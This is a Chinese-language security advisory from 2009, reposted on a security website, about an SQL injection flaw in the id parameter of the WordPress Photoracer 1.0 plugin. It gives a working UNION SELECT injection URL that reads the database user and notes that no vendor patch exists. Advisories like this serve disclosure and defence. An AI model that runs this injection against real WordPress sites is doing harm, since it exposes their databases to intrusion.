频道栏目
首页 > 安全 > 网站安全 > 正文

WordPress Photoracer插件id参数SQL注入漏洞

2009-06-22 22:31:43           
收藏   我要投稿

l kids blog

添加时间:
2009-06-19

系统编号:
WAVDB-01445
BUGTRAQ: 35382

影响版本:
Photoracer 1.0

程序介绍:

Photoracer是一个Wordpress论坛插件,允许从管理面板创建照片竞赛。

漏洞分析:

Photoracer插件的wp-content/plugins/photoracer/viewimg.php页面没有正确地过滤用户所提交的id参数输入,远程攻击者可以通过提交恶意查询请求执行SQL注入攻击。


漏洞利用:

http://site.pl/wp-content/plugins/photoracer/viewimg.php?id=-1+union+select+0,1,2,3,4,user(),6,7,8--


解决方案:
厂商补丁:

Paolo Palmonari
---------------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:

http://palmonaz.altervista.org/z/photoracer/?esohkb

信息来源:
<*来源:Kacper (kacper1964@yahoo.pl

链接:http://secunia.com/advisories/35450/

 

相关TAG标签 漏洞 插件 参数
上一篇:BHST文章系统漏洞
下一篇:dedecms v5.3 0day
相关文章
图文推荐
文章
推荐
热门新闻

关于我们 | 联系我们 | 广告服务 | 投资合作 | 版权申明 | 在线帮助 | 网站地图 | 作品发布 | Vip技术培训 | 举报中心

版权所有: 红黑联盟--致力于做实用的IT技术学习网站